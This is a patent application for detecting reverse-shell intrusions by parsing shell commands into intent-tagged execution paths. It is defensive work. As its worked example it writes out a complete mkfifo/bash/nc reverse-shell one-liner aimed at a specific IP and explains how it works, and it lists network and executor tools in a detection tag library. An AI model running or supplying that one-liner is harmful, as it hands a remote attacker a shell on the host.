Reverse shell detection method and apparatus, electronic device, and storage medium
By performing syntax analysis of shell commands, the execution intention and path are obtained, and the accuracy and complexity of rebound shell detection in the existing technology are solved, and efficient rebound shell intrusion detection is achieved.
Patent Information
- Application Number
- PCT/CN2024/132768
- Authority / Receiving Office
- WO · WO
- Patent Type
- Applications
- Current Assignee / Owner
- Priority Date
- 2023-12-28
- Filing Date
- 2024-11-18
- Publication Date
- 2025-07-03
AI Technical Summary
In the prior art, rebound shell intrusion detection methods are prone to lead to false positives or missed reports, and dynamic detection is complex, making it difficult to accurately identify complex rebound shell commands.
By performing syntax analysis of the first shell command, obtain the command execution intention, determine the command execution path, and determine whether it is a rebound shell intrusion command based on preset conditions.
Improves the accuracy of rebound shell detection, reduces false positives and missed reports, reduces detection complexity, and is suitable for variant detection in multiple programming languages.
Smart Images

Figure CN2024132768_03072025_PF_FP_ABST
Abstract
Description
Rebound shell detection method, device, electronic device and storage medium
[0001] This application claims priority to the Chinese invention patent application entitled “Bounce shell detection method, device, electronic device and storage medium” filed on December 28, 2023, with application number 202311842128.8. The entire contents of that application are incorporated herein by reference. Technical Field
[0002] The present disclosure relates to the field of network security technology, and in particular to a rebound shell detection method, device, electronic device, and storage medium. Background Art
[0003] With the development of the Internet, the application areas of information security technology are becoming more and more extensive.
[0004] Intrusion is an attack on a host or server. An attacker can gain control of a host or server by attacking it, and then use it to attack other hosts or servers, or directly exploit the computing resources of the host or server. It is a typical network threat.
[0005] Rebound shell attacks are a common method used by hackers to infiltrate various hosts and servers. Rebound shell intrusions can be detected using static or dynamic detection. However, static detection is prone to numerous false positives and false negatives, while dynamic detection is more complex. Summary of the Invention
[0006] In view of this, the purpose of the present disclosure is to provide a rebound shell detection method, device, electronic device and storage medium.
[0007] Based on the above objectives, the first aspect of the present disclosure provides a rebound shell detection method, including: obtaining a first shell command; performing grammatical analysis on the first shell command to obtain a command execution intent for the first shell command; determining a command execution path corresponding to the first shell command based on the command execution intent; and determining whether the first shell command is a rebound shell intrusion command in response to at least one node in the command execution path satisfying a first preset condition.
[0008] In some embodiments, the first shell command is generated by a first server, and the first shell command is used to enable the first server to access a second server.
[0009] In some embodiments, performing grammatical analysis on the first shell command to obtain the command execution intention for the first shell command includes: performing semantic parsing on the first shell command to obtain at least one command unit in the first shell command; and performing intent analysis on the at least one command unit to obtain the command execution intention.
[0010] In some embodiments, performing intent analysis on the at least one command unit to obtain the command execution intent includes: determining the first code language of the first shell command; based on the first code language, obtaining an intent tag library corresponding to the first code language, the intent tag library including functional attributes of at least some basic commands in the first code language; parsing the at least one command unit according to the intent tag library to obtain the command execution intent for each of the command units.
[0011] In some embodiments, the at least one command unit is parsed according to the intention tag library to obtain the command execution intention for each of the command units, including: obtaining the basic commands in the one command unit and the execution objects of the basic commands; based on the functional attributes of the basic commands and the execution objects of the basic commands, obtaining the command execution intention for each of the command units.
[0012] In some embodiments, obtaining the command execution intention for each of the command units includes: determining at least one of pipeline information, file information, network interaction information, input information, output information, and a command executor in each of the command units.
[0013] In some embodiments, determining the command execution path corresponding to the first shell command based on the command execution intention includes: obtaining the target command unit that meets the second preset condition in the at least one command unit and the association relationship between the target command units according to the command execution intention; and determining the command execution path between the target command units based on the association relationship.
[0014] In some embodiments, the second preset condition includes: at least one of the following: the node corresponding to the command unit has network interaction, a command executor, and a pipeline.
[0015] In some embodiments, in response to at least one node in the command execution path satisfying a first preset condition, before determining the detection result of the first shell command, it also includes: determining that the command execution path is a closed-loop path; wherein, the command execution path is a closed-loop path including: the first server obtaining a second command from the second server and executing the second command, and sending the execution result to the second server.
[0016] In some embodiments, the first preset condition includes: a network node exists in the command execution path; an executor node exists in the command execution path; and the network node is directly or indirectly connected to the executor node.
[0017] A second aspect of the present disclosure provides a rebound shell detection device, comprising: an acquisition module configured to acquire a first shell command; an analysis module configured to perform syntax analysis on the first shell command to acquire a command execution intent for the first shell command; a path construction module configured to determine a command execution path corresponding to the first shell command based on the command execution intent; and a detection module configured to determine whether the first shell command is a rebound shell intrusion command in response to at least one node in the command execution path satisfying a first preset condition.
[0018] A third aspect of the present disclosure provides an electronic device, including a memory, a processor, and a computer program stored in the memory and executable on the processor. When the processor executes the program, the rebound shell detection method described in the first aspect is implemented.
[0019] A fourth aspect of the present disclosure provides a non-transitory computer-readable storage medium, wherein the non-transitory computer-readable storage medium stores computer instructions, and the computer instructions are used to enable the computer to execute the rebound shell detection method described in the first aspect. BRIEF DESCRIPTION OF THE DRAWINGS
[0020] In order to more clearly illustrate the technical solutions in the present disclosure or related technologies, the following briefly introduces the drawings required for use in the embodiments or related technical descriptions. Obviously, the drawings described below are only embodiments of the present disclosure. For ordinary technicians in this field, other drawings can be obtained based on these drawings without paying any creative work.
[0021] FIG1 shows a flow chart of an exemplary method provided by an embodiment of the present disclosure.
[0022] FIG2 shows a flow chart of an exemplary method provided by an embodiment of the present disclosure.
[0023] FIG3 shows a flow chart of an exemplary method provided by an embodiment of the present disclosure.
[0024] FIG4 shows a schematic diagram of an exemplary command execution path provided by an embodiment of the present disclosure.
[0025] FIG5 shows a schematic diagram of an exemplary device provided by an embodiment of the present disclosure.
[0026] FIG6 shows a schematic diagram of the hardware structure of an exemplary computer device provided by an embodiment of the present disclosure. DETAILED DESCRIPTION
[0027] In order to make the objectives, technical solutions and advantages of the present disclosure more clearly understood, the present disclosure is further described in detail below in conjunction with specific embodiments and with reference to the accompanying drawings.
[0028] It should be noted that, unless otherwise defined, the technical terms or scientific terms used in the embodiments of the present disclosure should have the usual meanings understood by people with ordinary skills in the field to which the present disclosure belongs. The "first", "second" and similar words used in the embodiments of the present disclosure do not indicate any order, quantity or importance, but are only used to distinguish different components. "Include" or "comprise" and similar words mean that the elements or objects appearing before the word include the elements or objects listed after the word and their equivalents, without excluding other elements or objects. "Connect" or "connected" and similar words are not limited to physical or mechanical connections, but may include electrical connections, whether direct or indirect. "Up", "down", "left", "right" and the like are only used to indicate relative position relationships. When the absolute position of the described object changes, the relative position relationship may also change accordingly.
[0029] Rebound shells are a common method used by hackers to invade various hosts and servers. In the process of using rebound shells to invade hosts and servers, the intruder exploits system or software vulnerabilities to implant some shell scripts or virus programs into the invaded host or server. The intruder then opens one or more network listening ports. When the shell script or virus program is executed, it will actively access these network listening ports and establish a network session with the intruder. The intruder sends some commands for the invaded host or server to execute, or exploits system vulnerabilities to elevate the permissions of the virus process from ordinary user permissions to super privileged user permissions, and continues to invade the server system, steal confidential data, and even destroy the server system.
[0030] There are two main detection methods for rebound shell commands:
[0031] One method is static detection: shell commands are detected by extracting and matching keywords using regular expressions. Before detection, different rebound shell commands need to be collected and, based on these rebound shell commands, keywords for regular expression matching are generated. This detection method is generally only applicable to scripts containing simple rebound shell commands. It is generally ineffective for complex shell command scripts that are deformed or composed of multiple simple commands spliced in series, and may result in a large number of false positives or missed positives. In addition, for rebound shell commands written in languages such as Python and Node.js, traditional methods are more easily bypassed due to the presence of more obfuscation techniques.
[0032] The second method is dynamic monitoring: dynamic detection based on runtime system behavior events, typically based on whether network channels exist for the standard input and standard output of shell commands. However, this method cannot detect redirection of network file descriptors through named or anonymous pipes. In engineering, discovering correlations requires complex correlations among related process commands, making this solution highly complex to implement.
[0033] In view of this, the embodiment of the present disclosure provides a rebound shell detection method to solve the above problems. As can be seen from the above, the rebound shell detection method, device, electronic device and storage medium provided by the present disclosure obtain the command execution intention of the first shell command by performing grammatical analysis on the first shell command, and then determine the command execution path of the first shell command, and then combine the pre-set first preset condition to judge whether the first shell command is an intrusion command, thereby obtaining the detection result of the first shell command. This embodiment performs grammatical analysis on the first shell command, so that no matter how the first shell command is deformed and complexly spliced or how complex the language is, the real execution intention and execution process of the first shell command can be obtained, and then rebound shell detection is performed on the first shell command based on the real execution intention and execution process of the first shell command, so that more accurate detection results can be obtained, reducing the probability of false alarms or missed detections; at the same time, this embodiment directly obtains the real execution intention and execution process of the first shell command through grammatical analysis, which is less complex and easier to implement than the method of detecting based on the behavioral events of system runtime commands in dynamic monitoring.
[0034] As shown in FIG1 , the detection method includes:
[0035] Step S101: Obtain a first shell command.
[0036] The first shell command is a command generated by the server or host. A server or host may generate various types of commands during operation. In this embodiment, the first shell command generated by the server or host during operation can be obtained. A first server may generate various types of commands during operation. The first shell command is a command used to enable the first server to access the second server.
[0037] In this embodiment, the first server is an internal server and the second server is an external server. The first server's access to the second server may be a normal access, or it may be an access command sent by the first server to the external server after being hacked by the second server. Therefore, in this embodiment, a first shell command used by the first server to access the external server is obtained and tested to determine whether the first shell command is a rebound shell intrusion command. In other words, it is determined whether the first shell command is a normal access command from the first server to the second server, or an access command sent by the first server to the external server after being hacked by the second server.
[0038] In some embodiments, the most recently generated first shell command may be obtained, that is, the first shell command generated in real time on the server or host may be obtained, and the first shell command may be detected. Alternatively, the first shell command within a preset time period may be obtained for detection, which is not limited in this embodiment.
[0039] Step S103: Perform syntax analysis on the first shell command to obtain a command execution intention for the first shell command.
[0040] In some embodiments, the first shell command may be parsed based on an Abstract Syntax Tree (AST) to obtain a command execution intent of the first shell command. The command execution intent may be used to represent the meaning and structure of the first shell command, including the source of the command (e.g., input information), the execution process, and the result (e.g., output information), etc., which is not limited in this embodiment.
[0041] The Abstract Syntax Tree (AST) is an abstract representation of the grammatical structure of source code. It represents the grammatical structure of a programming language in a tree-like format. Each node in the AST represents a structure in the source code. For example, packages, types, modifiers, operators, interfaces, return values, and even code comments can all be grammatical structures.
[0042] Step S105: determining a command execution path corresponding to the first shell command based on the command execution intention.
[0043] After the command execution intention of the first shell command is obtained, a command execution path corresponding to the first shell command may be determined based on the command execution intention.
[0044] The command execution path includes the input, output, and execution process of each process or node in the first shell command, as well as the relationship between the input and output of each process or node, etc., which is not limited in this embodiment. For example, if the first shell command includes three nodes or processes A, B, and C, the command execution path can be: the input information of node or process A is obtained from X, the output information of node or process A is the input information of node or process B, the result generated by node or process B after performing operation a is used as the input information of node or process C, and the result obtained by node or process C after performing operation b is output to Y.
[0045] Step S107: In response to at least one node in the command execution path satisfying a first preset condition, determining whether the first shell command of the first shell command is a rebound shell intrusion command.
[0046] In this embodiment, a first preset condition may be set in advance, and it is determined whether each node of the command execution path meets the first preset condition, thereby determining whether the first shell command is an intrusion command, and obtaining a detection result of the first shell command.
[0047] In some embodiments, different first preset conditions may be set for different types of intrusion detection, wherein different types of intrusion detection may include rebound shell intrusion, Trojan horse intrusion, vulnerability intrusion, etc.
[0048] In some embodiments, for the same type of intrusion detection, if the code languages of the first shell commands are different, different first preset conditions may be set to perform intrusion detection on the first shell commands written in different code languages. This embodiment does not limit this.
[0049] In this embodiment, by performing grammatical analysis on the first shell command, the command execution intent of the first shell command is obtained, and then the command execution path of the first shell command is determined. Then, combined with a pre-set first preset condition, the first shell command is judged to be an intrusion command, thereby obtaining a detection result of the first shell command. In this embodiment, by performing grammatical analysis on the first shell command, no matter how the first shell command is deformed and complexly spliced, or how complex the language is, the true execution intent and execution process of the first shell command can be obtained. Then, based on the true execution intent and execution process of the first shell command, rebound shell detection is performed on the first shell command, thereby obtaining more accurate detection results and reducing the probability of false positives or missed detections. At the same time, this embodiment directly obtains the true execution intent and execution process of the first shell command through grammatical analysis, which is less complex and easier to implement than the method of detecting based on behavioral events of system runtime commands in dynamic monitoring.
[0050] In some embodiments, the first shell command is generated by a first server, and the first shell command is used to enable the first server to access a second server.
[0051] The first shell command is a command generated in the first server and is a command generated during the operation of the first server for enabling the first server to access the second server.
[0052] In this embodiment, the first server is an internal server and the second server is an external server. The first server's access to the second server may be a normal access, or it may be an access command sent by the first server to the external server after being hacked by the second server. Therefore, in this embodiment, a first shell command used by the first server to access the external server is obtained and tested to determine whether the first shell command is a normal access command from the first server to the second server or an access command sent by the first server to the external server after being hacked by the second server. This can determine whether the first shell command is a rebound shell intrusion command.
[0053] In some embodiments, as shown in FIG2 , the step S103 of performing syntax analysis on the first shell command to obtain the command execution intent for the first shell command includes:
[0054] Step S201: perform semantic analysis on the first shell command to obtain at least one command unit in the first shell command.
[0055] In some embodiments, the first shell command is formed by splicing and serializing multiple command units. Each command unit can be executed independently. The first shell command formed by splicing and serializing multiple command units can realize a more complex command script.
[0056] In this embodiment, semantic analysis is performed on a first shell command formed by splicing and serializing a plurality of command units, thereby splitting the first shell command into one or more command units.
[0057] In some embodiments, each command unit may be a simple shell command, and the first shell command is formed by concatenating multiple shell commands.
[0058] Take the first shell command "mkfifo / tmp / f; cat / tmp / f | / bin / bash-i | nc 172.223.241.235 222> / tmp / f" as an example, where the execution logic of the first shell command is as follows:
[0059] a) Create a named pipe / tmp / f;
[0060] b) Use the standard output of the named pipe / tmp / f as the execution input of bash, that is, bash executes the content of the named pipe;
[0061] c) Upload the standard output of bash to the remote server 172.223.241.235 via nc in anonymous pipe mode;
[0062] d) The remote server continuously sends commands through the named pipe / tmp / f, driving bash execution through step b.
[0063] To summarize the whole process: the hacker's remote command is received through nc and input into the named pipe / tmp / f, bash is used to drive the execution of the command received in the named pipe / tmp / f, and the execution result is uploaded to the remote server through nc, thus forming a rebound shell scenario.
[0064] In this embodiment, the command is parsed by an AST parser to extract the command units therein. The command units obtained by parsing include:
[0065] a)mkfifo / tmp / f
[0066] b)cat / tmp / f
[0067] c) / bin / bash -i
[0068] d)nc 172.223.241.235 222
[0069] e)> / tmp / f
[0070] Step S203: perform intent analysis on the at least one command unit to obtain the command execution intent.
[0071] In this embodiment, after the first shell command is split into one or more command units, intent analysis is performed on each command unit to obtain the command execution intent for each command unit.
[0072] In some embodiments, performing intent analysis on the at least one command unit to obtain the command execution intent in step S203 includes:
[0073] Step S301: Determine a first code language of the first shell command.
[0074] The first code language may be a shell language, or a language such as python, nodejs, etc., which is not limited in this embodiment.
[0075] Step S303: Based on the first code language, obtain an intent tag library corresponding to the first code language.
[0076] The intention tag library includes functional attributes of at least some basic commands in the first code language, such as mkfifo, |, cat, echo, bash, nc, etc., which are not limited in this embodiment.
[0077] In this embodiment, the code language of the first shell command is different, and the corresponding intent tag library is also different.
[0078] Taking the shell language as an example, the intent tag library can be:
[0079] a) Named pipe: mkfifo
[0080] b) Anonymous pipe: |
[0081] c) File descriptors: fd0, fd1, etc.
[0082] d) File operations: cat, echo, curl, wget, touch, etc.
[0083] e) Executor: bash, sh, exec, etc.
[0084] f) Network interaction: nc, / dev / tcp / , / dev / udp / , IP address
[0085] g) Redirection: >, >>
[0086] Source and destination, especially redirection via FD number, such as 2>&1
[0087] Among them, pipe is a way to implement inter-process communication in Linux. In the Linux system, pipe is a special file, and its main purpose is to implement inter-process communication.
[0088] fd: In Linux, fd stands for "File descriptor", which is an index created by the kernel to efficiently manage these opened files; it is a non-negative integer used to refer to the opened file. All system calls that perform I / O operations are implemented through file descriptors.
[0089] In this embodiment, during use, the intent tag library can be continuously expanded, and different intent tag libraries can be set for different code languages to meet the intrusion detection needs of different languages. At the same time, the intent tag library can be continuously enriched and adjusted to meet different needs, thereby enabling intrusion detection using commands in multiple languages and multiple deformations, which has good adaptability and maintainability.
[0090] Step S305: parse the at least one command unit according to the intention tag library to obtain a command execution intention for each command unit.
[0091] In some embodiments, step S305 further includes:
[0092] Step S401: Acquire a basic command in the command unit and an execution object of the basic command.
[0093] Step S403: obtaining a command execution intention for each of the command units based on the functional attributes of the basic command and the execution object of the basic command.
[0094] In this embodiment, basic commands and execution objects of the basic commands are extracted from each command unit. For example, the basic command in the command unit mkfifo / tmp / f is mkfifo, the functional attribute of mkfifo is to create a named pipe, and the execution object of the basic command is the named pipe / tmp / f.
[0095] The basic command in the command unit cat / tmp / f is cat. The functional attribute of cat is file operation, and the execution object is / tmp / f. Therefore, this command unit is used to use the result of / tmp / f as the standard output (stdout_1).
[0096] That is, in this embodiment, obtaining the command execution intention for each of the command units in step S403 includes: determining at least one of the pipeline information, file information, network interaction information, input information, output information, command executor, etc. in each of the command units.
[0097] In this embodiment, the intent tag library is used to perform intent analysis on each command unit to obtain a set of command execution intents for each command unit, as shown below:
[0098] stdin, stdout, and stderr are three special file descriptors in Linux. Linux allocates these three files for each running process. Stdin (standard input) reads data from the keyboard, while stdout (standard output) and stderr (standard error) are displayed in the terminal window by default.
[0099] In this way, the intention analysis of the first shell command is completed, and the command execution intention for the first shell command is obtained. Each command unit corresponds to an intention unit.
[0100] In some embodiments, as shown in FIG3 , determining the command execution path corresponding to the first shell command based on the command execution intention in step S105 includes:
[0101] Step S501: According to the command execution intention, a target command unit that meets a second preset condition in the at least one command unit and an association relationship between the target command units are obtained.
[0102] In some embodiments, different second preset conditions can be set for different intrusion types or different code languages, so that based on the second preset conditions, a target command unit that meets the second preset conditions is obtained, and the node corresponding to the target command unit is used as a node for judging the possibility of intrusion.
[0103] Taking the shell language as an example, the second preset condition may be set to include: at least one of network interaction, command executor, and pipeline exists in the node corresponding to the command unit.
[0104] Specifically, for each node, determine whether it includes the following attributes: process command line cmdline information, whether there is network interaction, whether it is a command executor, and whether there is a pipe (named pipe or anonymous pipe).
[0105] In addition, you also need to determine the standard input stdin, standard output stdout, file path, and file descriptor FD of each node.
[0106] Based on the second preset condition, obtaining a result of a target command unit corresponding to a node for determining intrusion possibility includes:
[0107] Based on the above, it can be seen that the target command unit includes mkfifo / tmp / f, / bin / bash-i, and nc 172.223.241.235222, that is, the node corresponding to the target command unit can be used to detect the first shell command.
[0108] In some embodiments, a graph algorithm is used to perform association calculations on the nodes corresponding to each target command unit, wherein the association attribute relationships are as follows: file<->stdin, stdout<->file, stdin<->stdout, FD<->stdin / stdout, wherein <-> indicates mutual association.
[0109] In some embodiments, an association attribute mapping table may be used to maintain association attribute relationships, and the association attribute relationships in the association attribute mapping table may be modified as needed.
[0110] Step S503: determining a command execution path between the target command units based on the association relationship.
[0111] As shown in Figure 4, after the nodes corresponding to the above-mentioned target command unit are associated through attributes, the following command execution path can be obtained: the shell commands issued by the second server 172.223.241.223 are received through the named pipe / tmp / f. These commands will be passed to the bash executor as standard input for execution, and the execution results will eventually be sent to the second server.
[0112] In some embodiments, after obtaining the command execution path, it is further necessary to determine whether the command execution path is a closed-loop path. Specifically, in this embodiment, if the first server obtains the second command from the second server, executes the second command, and sends the execution result to the second server, then the command execution path can be determined to be a closed-loop path.
[0113] In this embodiment, since the command execution path is a closed-loop path, step S107 can be executed to determine whether the first shell command is a rebound shell intrusion command in response to at least one node in the command execution path meeting the first preset condition.
[0114] In some embodiments, when the first shell command is a shell command and it is necessary to determine whether the first shell command is a rebound shell intrusion command, the first preset condition can be set to include: there is a network node in the command execution path; there is an executor node in the command execution path; and the network node is directly or indirectly connected to the executor node.
[0115] In this embodiment, since the command execution path meets the first preset condition, it can be determined that the first shell command is a rebound shell intrusion command. If the command execution path does not meet the first preset condition, it can be determined that the first shell command is not a rebound shell intrusion command.
[0116] In this embodiment, the first shell command can be parsed through the AST abstract syntax tree. First, the command unit of the first shell command is decomposed, and then the command execution intent is extracted for the command unit based on the intent tag library. Based on the command execution intent, the node corresponding to the target command unit that may be used for detection is determined. The ability of the graph algorithm is used to construct a path association for the attributes of the node corresponding to the target command unit to obtain the command execution path. Finally, the command execution is detected according to preset conditions, and it is finally determined whether the first shell command is a one-sentence rebound shell intrusion command.
[0117] This embodiment is applicable to rebound shell detection written in different programming languages (bash, python, nodejs, etc.). It only needs to use the corresponding AST parser for parsing. At the same time, during the system iteration process, the intent tag library and associated attribute mapping table are continuously enriched to complete the iteration of the model. It can support rebound shell attack variants of multiple languages and has good adaptability and maintainability.
[0118] It is understandable that before using the technical solutions of each embodiment of the present disclosure, the type, scope of use, usage scenarios, etc. of the personal information involved will be informed to the user in an appropriate manner, and the user's authorization will be obtained.
[0119] For example, in response to a user's active request, a prompt message is sent to the user to clearly inform the user that the requested operation will require the acquisition and use of the user's personal information. This allows the user to independently choose whether to provide personal information to the electronic device, application, server, storage medium, or other software or hardware that performs the operation of the disclosed technical solution based on the prompt message.
[0120] As an optional but non-limiting implementation, in response to a user's active request, the prompt information may be sent to the user in the form of a pop-up window, in which the prompt information may be presented in text form. Furthermore, the pop-up window may also contain a selection control for the user to select "agree" or "disagree" to provide personal information to the electronic device.
[0121] It is understandable that the above notification and user authorization process are merely illustrative and do not constitute a limitation on the implementation of the present disclosure. Other methods that comply with relevant laws and regulations may also be applied to the implementation of the present disclosure.
[0122] It should be noted that the method of the embodiments of the present disclosure can be performed by a single device, such as a computer or server. The method of the embodiments of the present disclosure can also be applied in a distributed scenario, where multiple devices cooperate to perform the method. In such a distributed scenario, one of the multiple devices may only perform one or more steps of the method of the embodiments of the present disclosure, and the multiple devices will interact with each other to complete the method.
[0123] It should be noted that the above description is limited to some embodiments of the present disclosure. Other embodiments are within the scope of the appended claims. In some cases, the actions or steps recited in the claims may be performed in an order different from that described in the above embodiments and still achieve the desired results. Furthermore, the processes depicted in the accompanying drawings do not necessarily require the specific order or sequential order shown to achieve the desired results. In certain embodiments, multitasking and parallel processing are also possible or may be advantageous.
[0124] Based on the same inventive concept, corresponding to any of the above-mentioned embodiments and methods, the present disclosure also provides a rebound shell detection device.
[0125] Referring to FIG5 , the apparatus includes:
[0126] The acquisition module 11 is configured to: acquire a first shell command;
[0127] The analysis module 13 is configured to: perform syntax analysis on the first shell command to obtain a command execution intention for the first shell command;
[0128] The path construction module 15 is configured to: determine a command execution path corresponding to the first shell command based on the command execution intention;
[0129] The detection module 17 is configured to: in response to at least one node in the command execution path satisfying a first preset condition, determine whether the first shell command is a rebound shell intrusion command.
[0130] In some embodiments, the first shell command is generated by a first server, and the first shell command is used to enable the first server to access a second server.
[0131] In some embodiments, the analysis module 13 is further configured to:
[0132] Performing semantic parsing on the first shell command to obtain at least one command unit in the first shell command;
[0133] Perform intent analysis on the at least one command unit to obtain the command execution intent.
[0134] In some embodiments, the analysis module 13 is further configured to:
[0135] determining a first code language of the first shell command;
[0136] Based on the first code language, obtaining an intention tag library corresponding to the first code language, the intention tag library including functional attributes of at least some basic commands in the first code language;
[0137] The at least one command unit is parsed according to the intention tag library to obtain a command execution intention for each command unit.
[0138] In some embodiments, parsing the at least one command unit according to the intent tag library to obtain a command execution intent for each command unit includes:
[0139] Obtaining a basic command in the one command unit and an execution object of the basic command;
[0140] Based on the functional attributes of the basic command and the execution object of the basic command, a command execution intention for each of the command units is obtained.
[0141] In some embodiments, obtaining the command execution intention for each of the command units includes:
[0142] Determine at least one of pipeline information, file information, network interaction information, input information, output information, and a command executor in each of the command units.
[0143] In some embodiments, the path construction module 15 is further configured to:
[0144] acquiring, according to the command execution intention, a target command unit in the at least one command unit that meets a second preset condition and an association relationship between the target command units;
[0145] Based on the association relationship, a command execution path between the target command units is determined.
[0146] In some embodiments, the second preset condition includes: at least one of the following: the node corresponding to the command unit has network interaction, a command executor, and a pipeline.
[0147] In some embodiments, in response to at least one node in the command execution path satisfying a first preset condition, before determining the detection result of the first shell command, the method further includes:
[0148] Determining that the command execution path is a closed-loop path;
[0149] The command execution path being a closed-loop path includes: the first server obtaining a second command from the second server and executing the second command, and sending the execution result to the second server.
[0150] In some embodiments, the first preset condition includes:
[0151] There is a network node in the command execution path;
[0152] There is an executor node in the command execution path;
[0153] And, the network node is in direct or indirect communication with the actuator node.
[0154] For the convenience of description, the above devices are described as being functionally divided into various modules. Of course, when implementing the present disclosure, the functions of each module can be implemented in the same or multiple software and / or hardware.
[0155] The device of the above embodiment is used to implement the corresponding rebound shell detection method in any of the above embodiments, and has the beneficial effects of the corresponding method embodiment, which will not be repeated here.
[0156] Based on the same inventive concept, corresponding to any of the above embodiments and methods, the present disclosure also provides an electronic device, including a memory, a processor, and a computer program stored in the memory and executable on the processor. When the processor executes the program, the rebound shell detection method described in any of the above embodiments is implemented.
[0157] FIG6 shows a more specific schematic diagram of the hardware structure of an electronic device provided in this embodiment. The device may include: a processor 1010, a memory 1020, an input / output interface 1030, a communication interface 1040, and a bus 1050. The processor 1010, the memory 1020, the input / output interface 1030, and the communication interface 1040 are communicatively connected to each other within the device via the bus 1050.
[0158] The processor 1010 can be implemented using a general-purpose CPU (Central Processing Unit), a microprocessor, an application-specific integrated circuit (ASIC), or one or more integrated circuits, and is used to execute relevant programs to implement the technical solutions provided in the embodiments of this specification.
[0159] The memory 1020 can be implemented in the form of ROM (Read Only Memory), RAM (Random Access Memory), static storage devices, dynamic storage devices, etc. The memory 1020 can store an operating system and other application programs. When the technical solutions provided in the embodiments of this specification are implemented through software or firmware, the relevant program code is stored in the memory 1020 and is called and executed by the processor 1010.
[0160] The input / output interface 1030 is used to connect input / output modules to implement information input and output. The input / output modules can be configured as components within the device (not shown in the figure) or can be externally connected to the device to provide corresponding functions. Input devices may include a keyboard, mouse, touch screen, microphone, various sensors, etc., and output devices may include a display, speaker, vibrator, indicator light, etc.
[0161] The communication interface 1040 is used to connect to a communication module (not shown) to enable communication between the device and other devices. The communication module can communicate via a wired method (such as USB, network cable, etc.) or a wireless method (such as mobile network, WiFi, Bluetooth, etc.).
[0162] The bus 1050 comprises a path for transmitting information between the various components of the device (eg, the processor 1010 , the memory 1020 , the input / output interface 1030 , and the communication interface 1040 ).
[0163] It should be noted that although the above device only shows the processor 1010, the memory 1020, the input / output interface 1030, the communication interface 1040, and the bus 1050, in a specific implementation, the device may also include other components necessary for normal operation. In addition, it will be understood by those skilled in the art that the above device may only include the components necessary to implement the embodiments of this specification, and does not necessarily include all the components shown in the figure.
[0164] The electronic device of the above embodiment is used to implement the corresponding rebound shell detection method in any of the above embodiments, and has the beneficial effects of the corresponding method embodiment, which will not be repeated here.
[0165] Based on the same inventive concept, corresponding to any of the above-mentioned embodiment methods, the present disclosure also provides a non-transitory computer-readable storage medium, which stores computer instructions, and the computer instructions are used to enable the computer to execute the detection method described in any of the above embodiments.
[0166] The computer-readable media of this embodiment include permanent and non-permanent, removable and non-removable media that can be used to store information by any method or technology. The information can be computer-readable instructions, data structures, program modules or other data. Examples of computer storage media include, but are not limited to, phase change memory (PRAM), static random access memory (SRAM), dynamic random access memory (DRAM), other types of random access memory (RAM), read-only memory (ROM), electrically erasable programmable read-only memory (EEPROM), flash memory or other memory technology, read-only compact disc read-only memory (CD-ROM), digital versatile disc (DVD) or other optical storage, magnetic cassettes, magnetic tape magnetic disk storage or other magnetic storage devices or any other non-transmission media that can be used to store information that can be accessed by a computing device.
[0167] The computer instructions stored in the storage medium of the above embodiment are used to enable the computer to execute the rebound shell detection method described in any of the above embodiments, and have the beneficial effects of the corresponding method embodiments, which will not be repeated here.
[0168] Those skilled in the art should understand that the discussion of any of the above embodiments is merely illustrative and is not intended to imply that the scope of the present disclosure (including the claims) is limited to these examples. Within the scope of the present disclosure, the technical features in the above embodiments or different embodiments may be combined, the steps may be implemented in any order, and there are many other variations of the different aspects of the embodiments of the present disclosure as described above, which are not provided in detail for the sake of simplicity.
[0169] In addition, to simplify the description and discussion, and so as not to obscure the embodiments of the present disclosure, known power / ground connections to integrated circuit (IC) chips and other components may or may not be shown in the provided figures. In addition, devices may be shown in the form of block diagrams to avoid obscuring the embodiments of the present disclosure, and this also takes into account the fact that the details of the implementation of these block diagram devices are highly dependent on the platform on which the embodiments of the present disclosure are to be implemented (i.e., these details should be fully within the purview of those skilled in the art). Where specific details (e.g., circuits) are set forth to describe exemplary embodiments of the present disclosure, it will be apparent to those skilled in the art that the embodiments of the present disclosure may be implemented without these specific details or with variations in these specific details. Therefore, these descriptions should be considered illustrative rather than restrictive.
[0170] Although the present disclosure has been described in conjunction with specific embodiments thereof, many alternatives, modifications, and variations of these embodiments will be apparent to those skilled in the art based on the foregoing description. For example, other memory architectures (e.g., dynamic RAM (DRAM)) may use the embodiments discussed.
[0171] The embodiments of the present disclosure are intended to cover all such substitutions, modifications, and variations that fall within the broad scope of the appended claims. Therefore, any omissions, modifications, equivalent substitutions, improvements, etc. made within the spirit and principles of the embodiments of the present disclosure should be included in the scope of protection of the present disclosure.
Claims
1. A reverse shell detection method, comprising: Obtaining a first shell command; Performing syntax analysis on the first shell command to obtain a command execution intention for the first shell command; Based on the command execution intention, determining a command execution path corresponding to the first shell command; In response to at least one node in the command execution path satisfying a first preset condition, determining whether the first shell command is a reverse shell intrusion command.
2. The method according to claim 1, wherein The first shell command is generated by a first server, and the first shell command is used to cause the first server to access a second server.
3. The method according to claim 1, wherein, The performing syntax analysis on the first shell command to obtain a command execution intention for the first shell command includes: Performing semantic analysis on the first shell command to obtain at least one command unit in the first shell command; Performing intention analysis on the at least one command unit to obtain the command execution intention.
4. The method according to claim 3, wherein, The performing intention analysis on the at least one command unit to obtain the command execution intention includes: Determining a first code language of the first shell command; Based on the first code language, obtaining an intention tag library corresponding to the first code language, the intention tag library including functional attributes of at least some basic commands in the first code language; Parsing the at least one command unit according to the intention tag library to obtain a command execution intention for each command unit.
5. The method according to claim 4, wherein The parsing the at least one command unit according to the intention tag library to obtain a command execution intention for each command unit includes: Obtaining a basic command in the one command unit and an execution object of the basic command; Based on the functional attribute of the basic command and the execution object of the basic command, obtaining a command execution intention for each command unit.
6. The method according to claim 5, wherein, The obtaining a command execution intention for each command unit includes: Determining at least one of pipeline information, file information, network interaction information, input information, output information, and a command executor in each command unit.
7. The method according to claim 3, wherein The based on the command execution intention, determining a command execution path corresponding to the first shell command includes: According to the command execution intention, obtaining target command units in the at least one command unit that satisfy a second preset condition and an association relationship between the target command units; Based on the association relationship, determining a command execution path between the target command units.
8. The method according to claim 7, wherein The second preset condition includes: at least one of a network interaction existing at a node corresponding to the command unit, a command executor existing, and a pipeline existing.
9. The method according to claim 1, wherein, Before determining a detection result of the first shell command in response to at least one node in the command execution path satisfying a first preset condition, further comprising: Determining that the command execution path is a closed-loop path; Among them, the command execution path being a closed-loop path includes: the first server obtaining a second command from the second server and executing the second command, and sending the execution result to the second server.
